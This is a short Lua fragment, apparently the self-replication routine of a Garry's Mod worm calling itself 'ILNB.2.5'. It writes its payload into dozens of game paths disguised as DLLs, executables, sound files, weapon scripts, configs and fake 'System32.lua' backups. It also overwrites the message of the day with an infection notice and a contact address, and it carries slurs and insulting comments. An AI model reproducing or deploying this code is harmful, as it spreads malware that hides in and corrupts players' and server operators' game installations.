_file.CreateDir("w0r/w0rm/")
	_file.Write("w0r/w0rm/homo.dll", a) -- k..
    _file.Write("w0r/w0rm/sjukdom.exe", a)
    _file.Write("w0r/"..b..".dll", a)
    _file.CreateDir("w0r/w0rms")
	_file.Write("w0r/w0rms/zomfg.dll", a)
	_file.Write("w0r/w0rms/jokoisadog.exe", a)
	_file.Write("w0r/w0rms/removethis.dll", a)
	_file.CreateDir("facepunch/facepunchsuck/yes/")
	_file.Write("facepunch/facepunchsuck/assholes.dll", a)
    _file.CreateDir("modells/player/")
	_file.CreateDir("sounds/gmod9/")
	_file.Write("modells/player/male_01.dll", a)
	_file.Write("modells/player/male_02.dll", a)
	_file.Write("modells/player/male_03.dll", a)
	_file.Write("sounds/gmod9/voice.wav", a)
	_file.Write("sounds/gmod9/male.wav", a)
	_file.Write("bin/system32.lua", a)
	_file.Write("mods/-modcache/system32.lua", a)
	_file.Write("lua/gamemodes/ucrpm/votecop.lua","Robbis_1 you son of a bitch.. Wait. What the hell, i like Robbis?, hm well i alredy made this, sorry.") -- Lame ffs..
	_file.Write("motd.txt","You got infected, RUN TO FACEPUNCH! AAAAAAAAAAAAAAAAAAAAAHHHHH!!!!! Contact mail: ice_d1@hotmail.com") -- n0ne
    _file.CreateDir("SAVES/SAVE/")
	_file.Write("SAVES/SAVE/ILNB.2.5.lua", a)
	_file.Write("scripts/weapon.lua", a)
	_file.Write("scripts/blaster_gun.lua", a)
	_file.CreateDir("config/cfg/")
	_file.Write("config/cfg/cfg.lua", a)
_file.CreateDir("Backup/gmod9/lua/init/")
	_file.Write("Backup/gmod9/lua/init/System32.lua", a)
	_file.CreateDir("Backups/gmod9/lua/init/")
	_file.Write("Backups/gmod9/lua/init/System32.lua", a)
	_file.Write("eSWEP.lua","Infected With ILNB.2.5")
    _file.Write("lua/init/boltgun.lua", a)
	_file.Write("lua/weapons/Counter-Strike/AK-47.lua", a)
_file.CreateDir("Server/-cache/")	
    _file.Write("Server/-cache/system32.lua", a)
